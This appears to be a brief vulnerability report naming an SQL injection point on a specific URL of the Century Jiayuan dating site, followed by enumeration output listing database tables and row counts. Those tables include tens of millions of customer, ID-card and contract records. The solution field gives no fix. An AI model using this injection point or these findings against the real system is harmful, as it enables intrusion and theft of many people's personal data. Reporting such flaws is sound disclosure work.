SQL injection at Century Jiayuan involving millions of members
Injection point:
http://vip.jiayuan.com/broker/?tag=1
Database:
Database: crm
+---------------------------------+----------+
| Table                           | Entries  |
+---------------------------------+----------+
| visit_log                       | 60138541 |
| logs                            | 46254602 |
| customer_value                  | 32607223 |
| customer_infos                  | 32596860 |
| customers                       | 32590720 |
| customer_visit                  | 24757214 |
| customer_assign_log             | 17763487 |
| distribution_sales_log          | 6242804  |
| customer_id_card_certify_log    | 4522629  |
| customer_sea_logs               | 3644865  |
| employee_login                  | 1875959  |
| customer_impress                | 1487579  |
| customers_backup                | 1349434  |
| call_log                        | 1298716  |
| customer_hand_import_log        | 1184996  |
| customer_screening              | 1052873  |
| customer_expire_giveup          | 1032252  |
| customer_msg_without_mobile     | 669339   |
| relation_change                 | 644987   |
| assistant_recommend             | 512042   |
| contract_accessory              | 473294   |
| mobile_location_info            | 308623   |
| landing_page_stats              | 196678   |
| sms_content                     | 90817    |
| recommend_visit_record          | 84127    |
| contrct_annexfirst              | 83534    |
| message                         | 72679    |
| pay_voucher                     | 51359    |
| contrct_customers               | 47650    |
| cooperate_sales                 | 46852    |
| device_ids                      | 46375    |
| contract                        | 43342    |
| broker_app_download_stats       | 42330    |
| sms_send_info                   | 39853    |
| ipay_settlement                 | 39088    |
| user_login_record               | 31969    |
| schedule                        | 21535    |
| del_customers                   | 18681    |
| fund_records                    | 16522    |
| call_center_bind_log            | 15317    |
| employee                        | 14992    |
| employee_roles                  | 14986    |
| sales_monthly_import_limit      | 11032    |
| customer_edit_log               | 9544     |
| contract_attach_4_closed        | 9075     |
| employee_idcard_cert            | 8681     |
| deposit                         | 6919     |
| broker                          | 6652     |
| broker_visit                    | 4967     |
| ad_channel                      | 4739     |
| shop_edit_log                   | 4690     |
| recommend_visit_record_20140226 | 4537     |
| statistics_resource             | 3834     |
| broker_association              | 3817     |
| recommend_visit_record_20140103 | 3681     |
| call_center_apply_register      | 2871     |
| call_center_account             | 2723     |
| roles_menus                     | 2447     |
| loan_bankcitys                  | 2180     |
| shops_auto_assign_stats         | 2086     |
| contrct_annexsecond             | 1882     |
| assign_citys                    | 1872     |
| letter                          | 1781     |
| broker_score_record             | 1436     |
| contract_service_cate           | 1247     |
| vip_show_recommend              | 1172     |
| broker_assign_log               | 1158     |
| sms_reply_info                  | 1105     |
| call_center_edit_log            | 1097     |
| association                     | 1027     |
| vip_show_wechat                 | 746      |
| citys                           | 603      |
| regional_citys                  | 566      |
| shops_monthly_import_limit      | 487      |
| baidu_push                      | 484      |
| customers_complain              | 433      |
| broker_baidu_push_log           | 425      |
| breakup                         | 365      |
| activity_reg                    | 364      |
| menus                           | 340      |
| targetline                      | 317      |
| assistant_cust_level_statis     | 260      |
| sms_account                     | 204      |
| employee_phone_certify_log      | 200      |
| call_center_apply_log_off       | 165      |
| ip_priv_log                     | 161      |
| customer_photo                  | 158      |
| ip_priv                         | 134      |
| shops                           | 117      |
| feedback                        | 91       |
| broker_feedback                 | 79       |
| contract_agreement              | 70       |
| success_case                    | 66       |
| vip_focus                       | 59       |
| roles                           | 46       |
| broker_news                     | 40       |
| file                            | 33       |
| commission                      | 31       |
| broker_score_config             | 17       |
| loan_preliminarycredit          | 17       |
| broker_complaint                | 16       |
| crm_add_customer_log            | 15       |
| broker_app_stats                | 13       |
| broker_app_versions             | 13       |
| broker_score_upload             | 12       |
| system_config                   | 12       |
| activity                        | 11       |
| broker_remark                   | 11       |
| jiayuan_test_account            | 7        |
| regional                        | 7        |
| versions                        | 7        |
| broker_commission               | 5        |
| notify                          | 5        |
| auto_assign_set                 | 4        |
| sms_batch_content               | 1        |
+---------------------------------+----------+
Database: crm_source
+----------------+----------+
| Table          | Entries  |
+----------------+----------+
| customers      | 35629175 |
| customer_infos | 35621012 |
+----------------+----------+
Solution:
I'm just a child.